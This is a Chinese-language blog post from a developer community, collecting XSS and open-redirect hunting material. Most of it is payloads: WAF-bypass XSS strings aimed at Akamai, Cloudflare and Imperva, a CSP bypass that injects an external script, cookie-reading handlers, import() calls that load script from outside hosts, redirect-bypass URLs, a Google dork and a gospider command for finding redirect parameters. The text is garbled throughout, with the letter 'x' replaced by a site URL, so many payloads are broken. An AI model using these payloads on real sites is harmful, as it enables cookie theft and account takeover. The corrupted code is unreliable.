XSS挖掘工具资源分享

2024-05-18 09:22:40 浏览数 (3)

XSS

  1. 测试不同编码方式并检查是否存在任何奇怪的行为
    1. <"&#https://cloud.tencent.com/developer/article/x27;`--!>
    2. 如果反应为&lt < --> 测试双重编码
    3. https://github.com/InfoSecOne/ghettoBypass
    4. https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
  2. 逆向工程开发者的思维

CSP

  • CSP审查工具
代码语言:javascript复制
1.  
2. mitsecXSS">
3. “><img src onerror=document.body.appendChild(Object.assign(document.createElement(&#https://cloud.tencent.com/developer/article/x27;script&#https://cloud.tencent.com/developer/article/x27;),{src:&#https://cloud.tencent.com/developer/article/x27;https:&#https://cloud.tencent.com/developer/article/x27;.concat(String.fromCharCode(47)).concat(String.fromCharCode(47)).concat(&#https://cloud.tencent.com/developer/article/x27;ehttps://cloud.tencent.com/developer/article/xternaljshere&#https://cloud.tencent.com/developer/article/x27;)}));>
4.

Waf

代码语言:javascript复制
Akamai JSi 
&#https://cloud.tencent.com/developer/article/x27;;k=&#https://cloud.tencent.com/developer/article/x27;e&#https://cloud.tencent.com/developer/article/x27;
top[&#https://cloud.tencent.com/developer/article/x27;al&#https://cloud.tencent.com/developer/article/x27; k &#https://cloud.tencent.com/developer/article/x27;rt&#https://cloud.tencent.com/developer/article/x27;](1)// 
 &#https://cloud.tencent.com/developer/article/x27;"><A HRef=" AutoFocus OnFocus=top/**/?.[&#https://cloud.tencent.com/developer/article/x27;ale&#https://cloud.tencent.com/developer/article/x27;+&#https://cloud.tencent.com/developer/article/x27;rt&#https://cloud.tencent.com/developer/article/x27;](document+cookie)>

CloudFlare HTMLi 
<Img Src=OnXSS OnError=alert(1)> 
<Img Src=OnXSS OnError=confirm(document.cookie)>

Imperva HTMLi 
<Img Src=//X55.is OnLoad=import(Src)>

工具和资源

  • cheat-sheet
  • Dom-https://cloud.tencent.com/developer/article/xss-burp

Referer https://cloud.tencent.com/developer/article/xss

  • window.history.replaceState() 替换历史来替换referer
  • https://webhook.site/
  • CRLF
代码语言:javascript复制
<body>
<a
href="https://www.marksandspencer.com.tr/cerez-politikasi?1111"
referrerpolicy="unsafe-url"
>
click me
</a>
<script>
window.history.replaceState(null,"","1.html")
</script>
</body>

Url跳转

重定向过程中会

深度利用

  1. windows.location: 寻找https://cloud.tencent.com/developer/article/xss
  2. 后端判定:寻找ssrf

bypass

代码语言:javascript复制
/https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
\https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//domain.com@https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
https://https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com/domain.com
https://https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com%23.domain.com
https://https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com?c=.domain.com (#  也可以)
////https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
////https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
https://domain.computer/
https://domain.com.https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
/
/https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com(	 , , 
, , /)
/https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com
//google。com


& ? # /  

google dork

代码语言:javascript复制
inurl:url= | inurl:return= | inurl:return_url= | inurl:rUrl=| inurl:r_url= | inurl:nehttps://cloud.tencent.com/developer/article/xt= | inurl:cancelUrl= | inurl:goto= | inurl:follow= | inurl:returnTo= | inurl:history= | inurl:redirect= | inurl:redirectTo= | inurl:redirectUrl= | inurl:goback= | inurl:redir= | inurl:redirUrl= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:ehttps://cloud.tencent.com/developer/article/xample.com

gospider

代码语言:javascript复制
gospider -w -r -a -s https://wwww.https://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/xhttps://cloud.tencent.com/developer/article/x.com  | grep -E "callback|/|redirect|url=|return|rurl|r_url|nehttps://cloud.tencent.com/developer/article/xt|cancelUrl|goto|follow|returnto|history|goback|redir=|ret=|r2=|page=|jump=|target="

Waf https://cloud.tencent.com/developer/article/xss payload

代码语言:javascript复制
"><img/src/onerror=import(&#https://cloud.tencent.com/developer/article/x27;//domain/&#https://cloud.tencent.com/developer/article/x27;)>"@yourdomain
013371337;ehttps://cloud.tencent.com/developer/article/xt=<img/src/onerror=import(&#https://cloud.tencent.com/developer/article/x27;//domain/&#https://cloud.tencent.com/developer/article/x27;)>

<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2https://cloud.tencent.com/developer/article/xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert&#0000000040document.cookie)>
<svg onload=alert&#0000000040"1")><””>
<Img Src=//X55.is OnLoad=import(Src)>



"><svg onmouseover="confirm&#0000000040document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
&#https://cloud.tencent.com/developer/article/x27;>ejj4sbhttps://cloud.tencent.com/developer/article/x5w4o
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=https://cloud.tencent.com/developer/article/x>Click me</button><hvita onbeforetoggle=" a b c " popover id=https://cloud.tencent.com/developer/article/x>Hvita</hvita>")
<a/href="javascript:Reflect.get(frames,&#https://cloud.tencent.com/developer/article/x27;ale&#https://cloud.tencent.com/developer/article/x27; &#https://cloud.tencent.com/developer/article/x27;rt&#https://cloud.tencent.com/developer/article/x27;)(Reflect.get(document,&#https://cloud.tencent.com/developer/article/x27;coo&#https://cloud.tencent.com/developer/article/x27; &#https://cloud.tencent.com/developer/article/x27;kie&#https://cloud.tencent.com/developer/article/x27;))">ClickMe
<Script>window.valueOf=alert;window+1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)


"><form onformdata=window.confirm(cookie)><button>XSS here<!--
1"onfocus='alert(document.cookie)' autofocus=
1"onfocus='window.alert(document.cookie)' autofocus=
"><


	

0 人点赞